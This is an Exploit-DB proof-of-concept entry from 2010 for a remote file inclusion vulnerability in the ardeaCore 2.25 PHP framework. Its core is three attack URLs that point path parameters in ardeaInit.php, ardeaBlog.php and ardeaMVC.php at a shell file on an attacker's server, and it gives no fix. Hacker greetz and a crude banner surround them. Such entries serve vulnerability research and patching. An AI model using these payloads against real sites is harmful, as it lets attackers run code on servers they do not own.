ardeaCore 2.25 - PHP Framework Remote File Inclusion

EDB-ID:

15840

CVE:

N/A

EDB Verified:

Author:

n0n0x

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2010-12-29

Vulnerable App:

******************************************************
[!] Discovered: n0n0x
[!] Homepage: http://priasantai.uni.cc/
[!] Remote: yes
******************************************************
  
*****************************************[ Hello gay ]***********************************************
****************************************************************************************************************
[x] PoC:

http://host/ardeaCore_v2.25/ardeaCore/lib/core/ardeaInit.php?pathForArdeaCore=[http://server/shell.tmp???]
http://host/ardeaCore_v2.25/ardeaCore/lib/core/ardeaBlog.php?CURRENT_BLOG_PATH=[http://server/shell.tmp???]
http://host/ardeaCore_v2.25/ardeaCore/lib/core/mvc/ardeaMVC.php?appMVCPath=[http://server/shell.tmp???]
****************************************************************************************************************

*****************************************[ Hello gay ]***********************************************
 
****************************************************************************************************************
[!] Thanks:
 
    manadocoding.net, sekuritionline.net
****************************************************************************************************************
[!] Greetz:
 
    str0ke, angky.tatoki,EA ngel, zvtral, s4va, bL4Ck_3n91n3, untouch, zreg, Valentin,team_elite
    devilbat.

[!] special thanks : cr4wl3r - cyberl0g
****************************************************************************************************************

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services